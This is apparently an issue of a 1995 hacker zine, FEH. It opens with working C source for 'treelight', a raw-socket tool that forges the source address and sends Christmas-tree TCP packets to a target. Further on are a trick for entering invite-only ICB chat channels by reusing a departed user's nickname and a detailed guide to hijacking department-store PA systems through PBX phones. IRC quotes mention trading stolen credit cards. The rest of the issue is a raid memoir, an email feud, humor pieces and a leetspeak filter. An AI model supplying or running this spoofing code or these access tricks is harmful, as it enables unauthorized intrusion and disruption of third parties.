
/* Send a "Christmas Tree Packet" (SYN, URG, PSH, FIN and 1 Byte of data) */
/* from source.port to dest.port. This type of packet is also known as a */
/* "Kamikaze Packet", "Nastygram", and "lamp test segment". */

pktsend.h:
/* Prototypes. */
int sendpkt_tcp(struct sockaddr_in *, unsigned short int, char *, unsigned
short int, unsigned long int, unsigned long int, unsigned short int,
unsigned short int, unsigned char, unsigned long int, unsigned long int);

int sendpkt_udp(struct sockaddr_in *, unsigned short int, char *, unsigned
short int, unsigned long int, unsigned long int, unsigned short int,
unsigned short int);

/*
* in_cksum --
* Checksum routine for Internet Protocol family headers (C Version)
*/

unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;

/*
* Our algorithm is simple, using a 32 bit accumulator (sum), we add
* sequential 16 bit words to it, and at the end, fold back all the
* carry bits from the top 16 bits into the lower 16 bits.
*/

while (nleft > 1) {
sum += *w++;
nleft -= 2;
}

/* mop up an odd byte, if necessary */
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}

/* add back carry outs from top 16 bits to low 16 bits */
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return(answer);
}

/* Send faked TCP packet. */
int
sendpkt_tcp(sin, s, data, datalen, saddr, daddr, sport, dport, flags, seq, ack)
struct sockaddr_in *sin;
unsigned short int sport, dport, s, datalen;
unsigned long int daddr, saddr, seq, ack;
unsigned char flags;
char *data;
{
struct iphdr ip;
struct tcphdr tcp;
static char packet[8192];
unsigned short int len=0;
char tcpbuf[8192];
char *p;

/* Fill in IP Header values. */
ip.ihl = 5;
ip.version = 4;
ip.tos = 0;
ip.tot_len = htons(40 + datalen);
ip.id = htons(31337 + (rand()%100));
ip.frag_off = 0;
ip.ttl = 255;
ip.protocol = IPPROTO_TCP;
ip.check = 0;
ip.saddr = saddr;
ip.daddr = daddr;
ip.check = in_cksum((char *)&ip, sizeof(ip));

/* Fill in TCP Header values. */
tcp.th_sport = htons(sport);
tcp.th_dport = htons(dport);
tcp.th_seq = htonl(seq);
tcp.th_ack = htonl(ack);
tcp.th_x2 = 0;
tcp.th_off = 5;
tcp.th_flags = flags;
tcp.th_win = htons(10052);
tcp.th_sum = 0;
tcp.th_urp = 0;

/* Add crap for our TCP checksum. */
memset(tcpbuf, 0, 8192);
p = tcpbuf;
memcpy(p, &(ip.saddr), 8); /* This will copy saddr & daddr into the buffer */
p += 9; /* Skip the 0 operator */
memcpy(p++, &(ip.protocol), 1);
len = htons(datalen + sizeof(tcp));
memcpy(p, &(len), 2);
p += 2;
memcpy(p, &tcp, sizeof(tcp)+datalen);

/* Now fill in the checksum. */
tcp.th_sum = in_cksum((char *)tcpbuf, sizeof(tcp)+12+datalen);

/* Now we copy our packet into a nice character array for sending. */
memcpy(packet, (char *)&ip, sizeof(ip));
memcpy(packet+sizeof(ip), (char *)&tcp, sizeof(tcp));
memcpy(packet+sizeof(ip)+sizeof(tcp), (char *)data, datalen);

/* And send... */
return(sendto(s, packet, sizeof(ip)+sizeof(tcp)+datalen, 0, (struct
sockaddr *)sin, sizeof(struct sockaddr_in)));

}

/* Send faked UDP packet. */
int
sendpkt_udp(sin, s, data, datalen, saddr, daddr, sport, dport)
struct sockaddr_in *sin;
unsigned short int s, datalen, sport, dport;
unsigned long int saddr, daddr;
char *data;
{
struct iphdr ip;
struct udphdr udp;
static char packet[8192];

/* Fill in IP header values. */
ip.ihl = 5;
ip.version = 4;
ip.tos = 0;
ip.tot_len = htons(28 + datalen);
ip.id = htons(31337 + (rand()%100));
ip.frag_off = 0;
ip.ttl = 255;
ip.protocol = IPPROTO_UDP;
ip.check = 0;
ip.saddr = saddr;
ip.daddr = daddr;
ip.check = in_cksum((char *)&ip, sizeof(ip));

/* Fill in UDP header values. Checksums are unnecassary. */
udp.source = htons(sport);
udp.dest = htons(dport);
udp.len = htons(8 + datalen);
udp.check = (unsigned short int)NULL;

/* Copy the headers into our character array. */
memcpy(packet, (char *)&ip, sizeof(ip));
memcpy(packet+sizeof(ip), (char *)&udp, sizeof(udp));
memcpy(packet+sizeof(ip)+sizeof(udp), (char *)data, datalen);

return(sendto(s, packet, sizeof(ip)+sizeof(udp)+datalen, 0, (struct
sockaddr *)sin, sizeof(struct sockaddr_in)));

}
-- cut here --

treelight.c:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_tcp.h>
#include <netinet/ip_udp.h>
#include <netinet/protocols.h>
#include <netdb.h>

#include "pktsend.h"

#define err(x) { fprintf(stderr, x); exit(1); }

unsigned long int
resolve(host)
char host[255];
{
unsigned long int addr;
struct hostent *he;

if((he = gethostbyname(host)) == NULL){
if((he = gethostbyaddr(host, strlen(host), AF_INET)) == NULL)
return -1;
}

bcopy(*(he->h_addr_list), &(addr), sizeof(he->h_addr_list));
return(addr);
}

void
main(argc, argv)
int argc; char **argv;
{
unsigned long int saddr, daddr;
unsigned short int sport, dport;
struct sockaddr_in sin;
int s;

if(argc!=5)
err("Usage: treelight <source_addr> <source_port> <dest_addr> <dest_port>\n");

/* Resolve Addresses. */
if((saddr=resolve(argv[1])) == -1)
err("Unable to resolve source address.\n");

if((daddr=resolve(argv[3])) == -1)
err("Unable to resolve destination address.\n");

/* Convert port numbers to integers. */
sport=(unsigned short int)atoi(argv[2]);
dport=(unsigned short int)atoi(argv[4]);

/* Open raw socket. */
if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
err("Unable to open raw socket.\n");

sin.sin_family = AF_INET;
sin.sin_addr.s_addr= daddr;
sin.sin_port = dport;

if((sendpkt_tcp(&sin, s, "1", 1, saddr, daddr, sport, dport,
TH_SYN|TH_URG|TH_PUSH|TH_FIN, 2387283, 2387238)) == -1)
err("Error sending our rad little packet.\n");
}
-- cut here --






<---------------------------------------------------------------------------->


<---------------------------------------------------------------------------->

Breakfast with the Secret Service
by Kamakize



September 8th 1995 6:42 am.
The phone rings. I let it ring a few times, then roll over and pick it up
only to hear a dial tone. I open my eyes and look over towards my caller-id
box to see who it was. The display is blank, according to the machine, the
phone never rang. Confused, but more concerned with sleep at the moment, I
closed my eyes and drifted back to sle....BEWM, my door slams open. My head
against my pillow, my eyes bulge as two large men enter my room and pronounce:
"Secret Service". They each grab an arm and drag me down the stairs, while
they informed me "cellular phone fraud is costing the United States one million
dollars a day"
. Some days being a hacker is less fun than others.
They started by asking me if anyone was home. They then slapped me with
the warrant and let in about 4 local police officers from the county.
They opened my parents room and said "Treasury Department" and grabbed them
to the kitchen table, and then asked for all weapons in the house. Having
unloaded the sole gun in the house, the search commenced.
First they asked for cooperation, and started taking the basic information
from me: Name, SSN, Address (WHY? WHY did they ask for the address, when they
where at the damn place?), and all phone numbers of the house, plus releases
to search the cars (a search warrant for a HOUSE does NOT include the cars or
"out buildings" on your premises, only the main building). By the time they
got us all down it was about 7:15am, and they started to ask basic questions
that your school or any credit agency knows when you apply for something,
(ie: employment history, ect.. wage at work, salary, ect.)
Then, the Computer Expert from DC came in and started to fool with our
family's business computer, and after scanning it, decided to let it be, since
he found nothing wrong. Then they visited my room (without my presence) and
searched my room somewhat half-ass, as if they weren't finding what they
wanted. Finally, they gave up, since I never had what they were looking for
to begin with.
They took me outside, and started questioning me. They kept asking me
WHERE is the EPROM burner, over and over, WHERE is the EPROM burner? Since
there wasn't one, that line of questioning wasn't going very far. I told them
I never cloned phones, and didn't know. They frowned.
Then they started to ask me what I knew about PMF. At this time when they
out of the blue said "PMF", I suddenly knew why they were there. I had an
account on his board, and had downloaded how-to files on cloning phones. Well,
information isn't illegal, but apparently it is enough for a search warrant.
I was taken outside countless times, and around 11:00am they let me sit down
and wait out the remainder of their search. They never once looked at my
computer on-line, not once. But finally, around 12:30pm they brought me up
to my room to show me what they were going to take with them; at 12:45pm they
left.
September 18th, two weeks after the search, they had me go downtown to
"sign a few papers and documents." I have yet to hear a word back, and
apparently the people in New Jersey working on the case are not talking much.
That day, the agents told me that they would get back to us before christmas.
Christmas has come and gone.
Six people were arrested in "Cybersnare", but there have not been any
arrests after that day. They were after people for cell phone cloning, and
for selling actual credit cards. It was all a result of people using Celco 51,
for more information about that read the article in FEH #2; a brief outline
is provided below.
In January of 1995, PMF came onto irc, pushing his bbs, demanding that you
prove you can get on by showing your knowledge of cell phones. In reality,
it wasn't PMF at all that was really running the board, it was 'Carder One'
that was behind it. It was set up in PMF's apartment building, and he took
care of it snitching on whatever.
In june, he went to Summercon '95 (a public hacker convention), alot of his
'friends' were there.. but they didn't know until 3 months later, he would
turn the table over. While he was there he had 2 cellular phones, he showed
me one. While outside on the street in atlanta, i asked him 'is that legit?'
He promptly said "What do you think?". I asked him again. That was ONE
question he would never answer. Now we know.

Possessions seized from me:
9/8/95 - 6:40am Date + Time warrant served.
1) packard bell monitor mode # and serial # listed
1) computer - CTG (no serial #)
1) model 5001 focus keyboard serial #
1) PC concepts mt 767 - power director Serial #
1) HP desk Jet 500C serial #
1) Caller Identification box - slim light , model #64
103) 3.5" floppy diskettes
Miscellaneous cables and connectors
4) boxes removed from car, misc documents
1) book: "
Internet firewalls and network security"

Thats all. Wierd eh? Taking the power director. Taking an ink jet, when
asked why the guy said so we can tell if you printed these documents here, I
said from an INK JET? (hmmm makes me wonder if the goverment has high
technology to summon ink back into a cart and see if it matches the same ink
in the cart).
Over all there was one nice agent there, he did talk about the SS some while
the others did there duty. They were there for about 7 hours, with a few
county cops coming and going. Strange, the raid didnt seem as "
scary" as it
should have been. Two weeks later the media came calling to me. 2 weeks.

<---------------------------------------------------------------------------->

---------------------------------------------------------------------

I'm a Hacker, You're a Hacker, wouldn't you like to be a Hacker too..

- Some thoughts from Mythrandir

---------------------------------------------------------------------

Hackers are everywhere. They are in the news. They are in the media.
They are on the news groups. They are on IRC. And they are multiplying
at an exponential rate. Right?... Nope.
But this is the way that the world sees it. This is the way that the
policy makers view the situation. This is the way that all of these so called
new hackers believe is happening.
The revolution is here! Let's cause havoc and fight the system. Destroy
big brother. We can free the information. We can liberate. Let's hack
into machines with all of these scripts that are around. Let's get
information from everyone. We can get free access to AOL.
We can steal money from people. We can take whatever we want. We are elite.
Right?... Nope.
What in the world is happening? Of course it is quite simple. Hacking
has moved into the mainstream. It has been glamourized by the media. It is
almost a household word. I wouldn't be surprised if we get trading cards.
It'd be more interesting than the OJ Simpson trading cards..
Because of this, everyone is thinking that "
hacking" is cool. It
seems like every kid in the country wants to be a hacker. Everyone is building
redboxes and running AOHell.
With all of this, I think it is time for a little re-education.
You see it is real simple. So simple that it defies so many. Tools do not
make a hacker. Breaking into machines does not make you a hacker.
Talking like you are elite does not make you a hacker. Only one thing makes
you a hacker.

Your Mind.

Be Elite, think first, ask questions later.

- Mythrandir
mythrndr@infonexus.com




<---------------------------------------------------------------------------->

Gray Areas
Who's On Your Side?
by FEH Staff

"
I didn't have anything against her until she threatened me."
-Emmanuel Goldstein

It is not all fun and games when you are publishing a hacker oriented zine
for profit. Two of the most well known, 2600 and Gray Areas, after what seemed
like outward respect for each other, has fallen into name calling and threats.
Netta has threatened to take this to the people, so here they are...

Date: Tue, 14 Nov 95 01:21 EST
From: grayarea@gti.net (Gray Areas Inc.)
To: emmanuel@2600.com
Subject: shame
Status: RO

it's a shame u did not tell me u4ea calls ur home on a friendly basis to talk
to phiber who i believe is still on federal probation. please answer this
before i take it public on the net. it's one thing for dennis and u4ea to fuck
with me and my company. it's far another for you to be AT ALL involved in it.
my logs show u message dennis every time he's on irc trying to get in better
with him. i am not at all pleased to see the pieces of the puzzle fitting
together as if you are befriending them so they will fuck with me and my
company instead of you and yours. i've stuck up for you when people wanted to
fuck you up. i wish you had the sense to at least stay out of this, or to have
been truthful with me that you have chosen to side with them.

p.s. this mail is intended for your eyes only. my last two calls to you were
discussed with other people. if you wanna discuss my bsuiness with kc and your
other friends, rest assured i'll tell (severe threats omitted).

---

Date: Tue, 14 Nov 95 01:35 EST
From: grayarea@gti.net (Gray Areas Inc.)
To: emmanuel@2600.com
Subject: Re: shame
Status: RO

um, no. u seem to like the idea of me giving you what i have. it's a one-way
street. it's enuf to say "
phiber is wigging out at that memory of yours."
i've done all of the talking to you i'm ever gonna be able to do i guess. as
for what your involvment is, that's what i offered you the opportunity to
comment on before this went further. i'll now let other people decide. there
are LOTS of people interested in both you and phiber. you of all people should
know that everything you do in this scene is practically public record and
that interfering with the existance of another publication is a serious legal
matter.

---

From: Emmanuel Goldstein <emmanuel@2600.com>
Subject: Re: shame
To: grayarea@gti.net (Gray Areas Inc.)
Date: Tue, 14 Nov 1995 01:46:06 -0500 (EST)

well, then you leave me little choice. from what i can see, you're either
writing your own fiction now or you've been duped by somebody else. either
way, i cannot allow you to threaten friends of mine with this nonsense.
i strongly suggest you tell me specifically what you're talking about before
this gets out of control.

---


<---------------------------------------------------------------------------->


<---------------------------------------------------------------------------->

*******************************************************
*** FEH Eleet Quotes for the month of December 1995 ***
*** Assembled By SnoNinja ***
*******************************************************

<emmanuel> at least i have a real life
<Geoman> cheeseball: I am working on unix not linux
<Zeed> PMF is the best hacker I know
<|al|> everyone will be elite for 15 minutes.
<Ace> i'll hack your FBI computer in a second!
<eggplant> i wanna be associated with golden showers
<ReDragon> I contract some of my coding out to SnoNinja
*Vision23* listen ReD, you're a fucking punk. I don't
have the time to waste figuring out how to ICMP bomb
whatever machine you're on, so for now I'll have to
settle for words. You're a real popular name. So noone
will suspect it was me who committed digital murder.
<_X> it took me 15 minutes to remember someones name
<loq> FEH HAS LESS USEFUL INPHO THAN ALL OTHER ELECTRONIC MAGAZINES COMBINED
<bianca7> hey anyone here willling to trade aol accounts for cc#'s?
<-[ReDragon]-> don't do that
<TheMaster> this could be a *Really* Stupid question, but im
trying to get password file here at the U of A, and ive tryed
in all the places where text files say to look, and so far all
ive been able to find is /etc/passwd. that may look to be the
correct thing..
<Gentry> try not to op fools.
<Anlk> Anyone want to trade "
sitez" (Ftp site with pirated comercial software)
or CC's (Stolen Credit Card Information), msg me. Let's talk.
<miguel> how can i make a war games dialer?
<techness> im looking for phiber_optik... have you seen him lately??
* begin quote
<bugs_> exactly. FEH is too closely scrutinized, too high profile
<ReDragon> YER ARTICLE ON INFILTRATING GOVERNMENT SITES ROOLZ BUGS
<bugs_> oh well, there is always plausible deniability to fall back on
* end quote
<ip> LEMME IN FEH 4 OR I'M NOT GIVING YOU ANY AFRO GREEZE
<_X> -r-x------ 1 root root 698170 May 18 1995 free.org.passwd*
<Okinawa> I got a program, 64,000 linez of code, and it does nothing
<Okinawa> not bad
<Okinawa> at least it compiles clean
<UpLink> FEH is dope
<SnoNinja> I am whoring myself for quotes
*Crax* IF YOU DIE I'LL REFUND YER MONEY
* begin quote
<SnoNinja> Why would you rm any site?
<force> cuz I am a fucking gangster
* end quote
<force> no one can be as lame as me
<violator_> linux is the mac daddy os.. but not on a mac
[BigAl:bigal@carroll.com] hey dude you a pro? I need help
[wierd:bob@netaccess.on.ca] feh kicks ass, i am just a beginner now, but
one day i will be great
*monk202* Feh cracks me up. I LOVE IT! This is what Phrack should've been...

<---------------------------------------------------------------------------->

---=== T H E ===---
--
-- -- ---- -- -- --
-- -- -- -- -- --- -- -- --
--- --- -- -- -- - ---

  
-- -- ---- -- -- --

---=== L I S T ===---
Allen 3. Smith

Greetz to: all the homies hangin w/ the cool posse. Nigs in
the house. 007, james kahn, marissa tomei, 8o8 state,
011-posse, the leets, e-paq, all the j00s, whatney's
cream stout, aol lamerz, all bofh's, phase dist,
optik n3rve, BNF, Kleene, feynman, turing, shannon,
nyquist, kernighan, pike, VSB, QAM, NRZ, and most of all
to the #hack chicks.

word
werd
wird
wurd
w1rd
w3rd
w0rd
whord
wherd
whird
wh1rd
wh3rd
wh0rd
wirred
w1rred
worred
w0rred
wirr3d
w1rr3d
worr3d
w0rr3d
whirred
wh1rred
whorred
wh0rred
whirr3d
wh1rr3d
whorr3d
wh0rr3d



<---------------------------------------------------------------------------->

Mac's Vs. PC's
Artikle By nicotine
(The one that hangz on #hack not #korea)
aka `nic0tine


wh4zz4p:x0x,xgirl,redragon,katana,mudman,snoninja,l0ra,vampirella,lynch,
tigger,ice-9,roach,kemo,strict9,hosaka,andtherestofthehappy#hackfamily.

Listen to this. This has been a long debate of people, basicly the result is
that the people that want it easy but more expensive and not as much software
choose makz, and the people that want it hard but less expensive and lots
more software choose pc's, but now sience the "PC Echange" for makz can
change shit over its kinda changed... makz are better for webin' and aol
and pc's for hacking and shit.

PC's Very Own Debate:
"Forget That Makz Are Lame"
from "The Real Cyberpunk Fake Book":
Macs are easy, but they insulate you from the gory component-level HARDWARE
hackery, and it's all the kard swapping, IRQ fiddling, dipswitch setting,
chip pulling, and tooth gnashing that make the intel based PC world very
cyberpunk (haqr like). Using a mak makes it a hurl of a lot harder to achive
deep geekhood, and you're far less likely to build up really neat piles of
old interface kardz, motherboards, and obsolete hard drives. (Although
maks have thier own tools JUST TO OPEN THEM UP which you could leave around
looking like you are doing a open heart surgury.)

Also, you never hear of people building macs from the 3 various catalogs and
from the dumpster behind Joe's Bait and Chip shop. YOU CAN DO THIS WITH PC'S,
and any extra parts around your apartment around your home and give it that
hacker feeling.

Novelist Umberto Eco compared the mac operating system to the Catholic church.
Belivers (Users) Must approach god (the hardware) through a thick layer of
churchy inderection and simplifacation (icons, symbols, point-and-click),
while DOS is very Protestant--you're responsible for achieving ON YOUR OWN,
damn it, and confess your sins DIRECTLY to GOD, AND NO KISSY FACED ICONS
BETWEEN.
-THE END-
-----------------------------------------------------------------------------
ICB hacking
There is a chat program called ICB (Internet Citizens Band).
Lots of times there is an invite only channel and I will
Explain to you how to get into one without being invited.

First you must monitor the channel and wait until someone leaves (signs off)
and then change your nick to what thier nick WAS. Enter the channel.
How this works:
The ICB server keeps a list of people who are invited into the channel.
It keeps their nick, not their address, so if anyone enters the invite only
channel then it will think it iz them.

comments? questions? pizza? sex? talk?
nicotine@deeptht.armory.com

<---------------------------------------------------------------------------->

How Tew Hax0r An ATM Macheene
by shadow tao

tew buyld aye tao-box yew will need:

1. a beeg kardbord box. (get one that had a cold-macheene or a
sw1shee-woosh-woosh macheene)
2. sum sizzors.
3. a voyce.
4. sum crayons. (prufurablee 486/60 cray-olas.)
5. a red box.
6. a dollor b1ll.

ok!@ get da big box (nota big redboxdumbass!) and kutt slits inda
front and draw on it like dis:

_______________________
/______________________/|
| maytag atm dood! ||
| ==== <-------- card sl1tt!!
|free ||
|warez! xxx <------------tape red bocx here!@#
| xxx ||
|qw1k xxx ||
|kash! ||
| ==== <-------- kash sl1tt!!
|______________________|/


okay! now that you have done this! hide in the box and wait for
sukkerrz!!! wen the sukkerz put ther kard in! wate forr the kodez!! if
joo donut here da kode! say:

"um...please speak the kode into da box..er...atm."

but! besure that you say it in a robotvoyce or dey will call da pigz!
once joo gotda kodes, steek the doller out da kash sl1tt adn say:

"boopboopboop! macheene errer! pleeze go away!!!!!!"

wate for sukkerr to leeve adn run adn useda kodez! runrunrun! da
sukkerrz got da gunz!

if he dosnot go away adn wonts his kardd bak say:

"um. no."

if he still won't go away - offer h1m warez!

dont put da box in da rode! yu wil be run over! if peepul see yu in
da box say yu are da magic atm elf! offer dem warez!

<---------------------------------------------------------------------------->

.--[An official]----------------------.
: .-----. .-----. .--.--. :
: : .--' : .--' : : : :
!_-:: : `--. : `--. : . : ::-_!
:~-:: :: .--' :: .--' :: : ::-~:
: ::.: ::.`--. ::.: : :
: `--' `-----' `--'--' :
`----------------------[Production]---'
(pretty phat ascii eh?)

Title: Department store PBX overhead paging for the elite
Author: Tele Monster (telmnstr) (tm)

1. Intro
--------

HAVE YOU EVER BEEN INTO A DEPARTMENT STORE AND GOT TIRED OF HEARING SOME
RASPY HOMEGIRL UP FRONT TALKING OVER THE INTERCOM. SECURITY TO BLOCK 12A.
WE GOT SOME LOST BRAT NAMED MICHELLE AT COURTESY DESK. SOMEONE TO THE
ELECTRONICS DEPARTMENT. BOOOOP.

NOW ITS _YOUR_ TURN TO TAKE TO THE INTERCOM AND SPILL YOUR THOUGHTS.
THATS RIGHT, TELL THAT OLD WAL*MART GREETER WHAT YOU THINK OF HIM, AND
HOW HE WON'T GREET TEENAGERS BECAUSE HE THINKS THEY ARE ALL SPOILED SCUM.
TELL THAT BITCH THAT WON'T HELP YOU IN THE ELECTRONICS DEPARTMENT THAT
SHE IS UNOFFICIALLY FIRED. LAY OFF THE ENTIRE STAFF. USE YOUR IMAGINATION.

2. How
------

First you must go into your store of choice. After inside scope out
the camera bubbles and how many cops are there. This generally
doesn't matter as they don't care who says what over the intercom. There
isn't a law that says you can't talk on the phones provided in the isles.
(There is however a law that says no shouting fire in a theatre, keep
that in mind. This also applies to no shouting fire in a wall*mart.
Opps. This is too new school.)

NOW YOU MUST FIND THE TELEPHONES. THESE ARE GENERALLY ON A POLE THAT
SUPPORTS THE ROOF. GOOD THING THOSE POLES ARE THERE, EH? ANYWAYS. IN MANY
STORES THEY MARK THE POLE AT THE TOP SO YOU CAN SEE IT ALL OVER. THE ONES
WITH FIRE EXTINGUISHERS ARE NORMALLY MARKED WITH A RED ARROW OR RED LINE
AROUND THE TOP. WALL*MART MARKS THEIR TELEPHONE POLES (HAHA) WITH A BLUE
BAND AROUND THE TOP. THE OTHER TWO STORES (REMEMBER THEY ARE GENERALLY
REGIONAL SO NO USE IN TALKING ABOUT THOSE SPECIFICALLY HERE) FOLLOW THE
SAME WAY EXCEPT IT IS A BLUE ARROW POINTING DOWNWARD WITH "PHONE"
WRITTEN ON IT. W0RD.

(lets take it to the really really old school)
NOW YOU MUST DETER-MINE THE TYPE OF TELEPHONE SYSTEM USED. SOME POPULAR
ONES ARE NORTHERN TELECOM MERIDIAN SYSTEMS AS WELL AS COMDIAL. AT&T SPIRIT
AND MERLIN SYSTEMS MAY BE USED, BUT THEY ARE GENERALLY AVOIDED BECAUSE OF
AT&T'S GREED. THEY ARE JUST TOO EXPENSIVE. ROLM/SIEMENS AND TOSHIBA ARE
SOME MORE POPULAR BRANDS. ONCE AGAIN ROLM IS GENERALLY FOR BIG PLACES, NOT
BOBOSQUATNOT STORES.

ANYWAYS ONCE YOU SCOPE OUT YOUR TELEPHONE YOU MUST THEN FIGURE OUT TO GET ON
THE OVERHEAD. SOME STORES ACTUALLY HAVE WHAT LOOKS LIKE JUST A NORMAL
TELEPHONE HOOKED TO THE KSU. THIS REALLY SUCKS WHEN THIS HAPPENS. Hopefully
there will be and extension list next to, under or on the handset. Look for
PAGE, OVERHEAD or anything close (PGE, OVRHEAD). Intercom is generally for
station to station communication. They might just plug the audio amplifier
into one of the extensions, it depends. Generally though, there will be this
BIG PHAT button that says... PAGE. On the comdial systems, you will notice
that there might be a light under the button or over the button that comes on
when someone talks over the overhead. Look on the other phones to see if an
arrow appears on the LCD screen or led lights when they talk. This can easily
narrow it down. If you are on a normal bobo handset just dial something and
when you get someone ask, "What is the extension for the overhead page."
"69 why who is this?" "thank you <click>" .. Pick up romp on the 69 and
kwakbam. Jibbie jibbie jibbie jibbie.
(I lost the old school touch)

I forgot where I was... hmmm.
Anyways. If it is the Meridian (Awwyea) system, and the key isn't labeled,
keep hiting all of the buttons until you hear yourself grunting twelve times
as loud.
Generally Wall*Mart phones have somewhat of a low audio level over the page.
The Meridian at Hills department store is really loud, as they use the outside
paging horns as the speakers. The louder the more funny, but you gotta do it
with attitude or else it is easy to start lauging. It sounds pretty pathedic
to the normals in the store when they hear, "Hi you hahahah bahahahahah
<Click> boop"

One wall*mart near us converted over to the old style telephones (No buttons,
just a normal 12 key keypad.. still on a pbx though) because of problems of
unauthorized overhead paging (that just sounds funny). If you are REALLY
BALLSY and these phones used a standard 2 line hybrid interface into the pbx,
you could go open up a cordless phone, plug it in for 20 minutes while you
hang out and jam Just Like Heaven on the toy pianos as the NiCad recharges.
Then plug the cordless in where the phone was (check first to make shure it
isnt a RJ-45 connector. If all else fails, the cordless will fry). If all does
go well.. muhahah wireless mobile unauthorized overhead paging in a bobo
squatnot store.
(and hey, you didn't STEAL the phone cause its still in the store).

3. What to say
--------------

This is the hardest part. What to say. If your a little twelve year
old you might just burp in the thing or something. But if your a little older
you can only display your wrath of eliteness thru what you say and how you say
it.

"Yo wally world shoppers, You are the grand prize Winna!@# For the
next 10 minutes everything in the store you can fit in two shopping
carts is yours free. Limit one computer and sofa per customer. GO!"

(Bam. Every wallmart shopper kicks into supermarket sweep mode.)
** This might count as yelling Fire in a Wall*Mart. So contact your
nearest lawyer for some consultation first. :) If you care.
*** This hasn't been tested yet.
**** If you do it, tell me how it goes.
***** The host of supermarket sweep is sum guy with a sweater,
Thanks to h0trod for this info.

One case we did do in which we were caught was at a going out of sale
at a biglots store. They sell excess invetory, and have no sense of
humor. The conversation wen't like this:

over pa> "boop. Hi. MOM? MOM? ARE YOU THERE? No no I can't hear you"
Guy walks up from behind. Taps thy on the shoulders.
over pa> "Huh?"
Guy "See that exit door right there?"
over pa> "yea"
guy "I want to see you on the otherr side"
over pa> "Oh. so leave?"
guy nods yes.

That is the WORSE thing that has ever happened when pa'ing. Its not
illegal to do stupid stuff like that.

Another one in a wally whirrled (wall*mart)
"Hi. I'd like to take this moment to mention that you all suck"
>"Security to sector 120"
"Cancel that security, go to sector Z. There isn't a problem"
Other lines that have been said:
"Aww yea 240 dolla's worth of puddin. At a wally world sale"
"Despite all my rage I still end up on the hills overhead page"
If you have wussy friends, they tend to run when you start talking.
It is most hilarious if there are non-employee shoppers all in the
isle when you pick up and scream. They just give you that look and
some of them smile and laugh and stuff.

4. Quick reference to found pa/pbx systems
------------------------------------------
.---------------.----------------------.-------------------------------.
: Store : PBX Brand : To initiate page :
`---------------'----------------------'-------------------------------'
Wall*Mart Comdial PAGE button
Macys Unknown ??
Sams Comdial PAGE button
Sears Unknown ??
HQ Warehouse Toshiba ??
FAO Shwartz Unkown ??
Lowes Meridian ??
Caldors Unknown ??
Hills Meridian PAGE button
Taco Bell Unknown ??
K-mart Unknown (standard) 66
BJ's Unknown ??


* This can all change depending on what store and who installed there
telecom system. The don't have to contract it out on a national basis.

5. Other goofy ideas
--------------------
* Take an old walkman and add a rj-14 or whatever the hell the handset
connector is. Pin it out so that the audio from the walkman is piped
into the mic leads of the phone. Carry it in there and plug it in in
place of the handset. Take the handset and chuck it behind the maxi's
pop page press play and adujust the audio so its clear.
* If you notice a nasty HUMMM noise on the pa, go to the customer
service desk after you say all of that mess, and notify them that
they have an audio isolation problem. Tell them they should put a
isolation transformer on the ac line or between the amp and pbx
system. Tell them there may be some signal loss using a transformer
on the audio line but with the shitty quality it doesn't matter
anyways. Generally the hum is at 60 hertz (same as AC line power).

Greetz:CasretCgRedragonLoqDhateBl0keIppy
bah. im tired of this UhermW1ldMrhydeMisfitMr804MotherU4eaD_D
article. so this is the ErikbEmmanuelYomammaTheeJokerJulietOphie
e n d. LANshark][cemanGentry|al|t3AlbatrossMooks
GlennntsSet0nchmawdteklordVainrst0bias
sn0crashsnoNinjaXgirlL0raX,Y,Z,Aborted
and CYN0BYTE!@#

<---------------------------------------------------------------------------->

The Tales of oof.- (c) 1995 t3 Incorporated.

Once upon a shining tooth,
I witnessed thee his name was oof.
He spoke to me in lore of old,
about a land covered with mold.

It spawned small creatures,
all shapes and sizes,
some of them looked like cereal surprises.

They spoke a tongue called ancient foo,
reveled across the land,
and when the words were spoken true,
you knew who was in command.

These creatures came from miles around,
to here the minister speak,
sometimes a few of the souls would ask
"do you know how to phreak?"

Then oof would roar with a thunderous laugh,
and wave his magic wand,
a flash of lightning and a puft of smoke,
and suddenly the creature was gone.

The creatures came to understand,
that sir oof was their own true god,
and when he heard them chanting so,
he bowed his head to nod.

And so this tale winds to an end,
with the master pleased with me,
I feel a sense of warmness when,
oof speaks to me.








<---------------------------------------------------------------------------->

The Elite Speak Filter
by SnoCrash



/* u4ea_filter 1.06 -- SnoCrash[FEH] */
/* Just start this up and paste lines of baffling u4ea-speak in. */
/* Nearly recognizable English text will pop out! */
/* Since u4ea-speak changes nearly every day, please send your */
/* additions to: snocrash@hackerz.org or snoninja@pussy.org */
/* compiles with: gcc -O2 -Wall -o u4ea_filter -s u4ea_filter.c */
/* Usage example: */
/* echo "y00 4r3 cl00l3$$, sn0d0rk" | u4ea_filter */
/* would produce: */
/* you are clueless snodork */

#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define usage() { fprintf(stderr, "Usage: %s [infile] [outfile]\n", argv[0]); exit(1); }

FILE *out;

void
filter_word(word)
register char word[100];
{
/* Some of u4ea's favorite words. */
if(!strncmp(word, "klooless", 8)) fprintf(out, "clueless");
else if(!strncmp(word, "clooless", 8)) fprintf(out, "clueless");
else if(!strncmp(word, "layme", 5)) fprintf(out, "lame");
else if(!strncmp(word, "joo", 3)) fprintf(out, "you");
else if(!strncmp(word, "o-day", 5)) fprintf(out, "0-day");
else if(!strncmp(word, "fook", 4)) fprintf(out, "fuck");
else if(!strncmp(word, "yoo", 3)) fprintf(out, "you");
else if(!strncmp(word, "uaea", 4)) fprintf(out, "u4ea");
else if(!strncmp(word, "kodez", 5)) fprintf(out, "codes");
else if(!strncmp(word, "lozer", 5)) fprintf(out, "loser");
else if(!strncmp(word, "uze", 3)) fprintf(out, "use");
else if(!strncmp(word, "uzer", 4)) fprintf(out, "user");
else if(!strncmp(word, "gno", 3)) fprintf(out, "no");
else if(!strncmp(word, "dood", 4)) fprintf(out, "dude");
else if(!strncmp(word, "donut", 5)) fprintf(out, "don't");
